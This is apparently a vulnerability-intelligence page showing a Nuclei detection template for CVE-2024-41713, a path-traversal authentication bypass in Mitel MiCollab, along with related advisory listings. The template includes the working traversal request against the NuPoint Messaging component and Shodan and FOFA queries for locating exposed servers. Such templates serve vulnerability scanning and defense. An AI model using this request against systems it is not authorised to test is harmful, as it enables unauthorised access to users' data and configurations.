Mitel MiCollab vulnerability allows unauthorized access via authentication bypass, risking data integrity.
Reporter | Title | Published | Views | Family All 15 |
---|---|---|---|---|
Cvelist | CVE-2024-35286 | 21 Oct 202400:00 | – | cvelist |
Cvelist | CVE-2024-41713 | 21 Oct 202400:00 | – | cvelist |
GithubExploit | Exploit for Path Traversal in Mitel Micollab | 11 Jan 202502:39 | – | githubexploit |
GithubExploit | Exploit for Path Traversal in Mitel Micollab | 5 Dec 202406:13 | – | githubexploit |
Vulnrichment | CVE-2024-35286 | 21 Oct 202400:00 | – | vulnrichment |
Vulnrichment | CVE-2024-41713 | 21 Oct 202400:00 | – | vulnrichment |
NVD | CVE-2024-35286 | 21 Oct 202421:15 | – | nvd |
NVD | CVE-2024-41713 | 21 Oct 202421:15 | – | nvd |
OpenVAS | Apache Axis2 Detection (HTTP) | 20 Sep 201000:00 | – | openvas |
OpenVAS | Directory Scanner | 3 Nov 200500:00 | – | openvas |
id: CVE-2024-41713
info:
name: Mitel MiCollab - Authentication Bypass
author: DhiyaneshDK,watchTowr
severity: high
description: |
A vulnerability in the NuPoint Unified Messaging (NPM) component of Mitel MiCollab through 9.8 SP1 FP2 (9.8.1.201) could allow an unauthenticated attacker to conduct a path traversal attack, due to insufficient input validation. A successful exploit could allow unauthorized access, enabling the attacker to view, corrupt, or delete users' data and system configurations.
reference:
- https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2024-0029
- https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/?123
- https://nvd.nist.gov/vuln/detail/CVE-2024-41713
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-41713
cwe-id: CWE-22
epss-score: 0.00044
epss-percentile: 0.12006
metadata:
verified: true
max-request: 1
vendor: mitel
product: cmg_suite
shodan-query: http.html:"Mitel Networks"
fofa-query: body="mitel networks"
tags: cve,cve204,mitel,cmg-suite,auth-bypass
http:
- raw:
- |
GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Available services"
- "Service Description"
condition: and
- type: status
status:
- 200
# digest: 490a00463044022071c2e0cacae9ddccb1def297ab46e88b91dc5ff1f5f3d05c8f2181e5070d23e2022062a66764361eca00011f8568ae9df5c05a3e47bcc30221e27fc52dff54ad76b3:922c64590222798bb761d5b6d8e72950
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo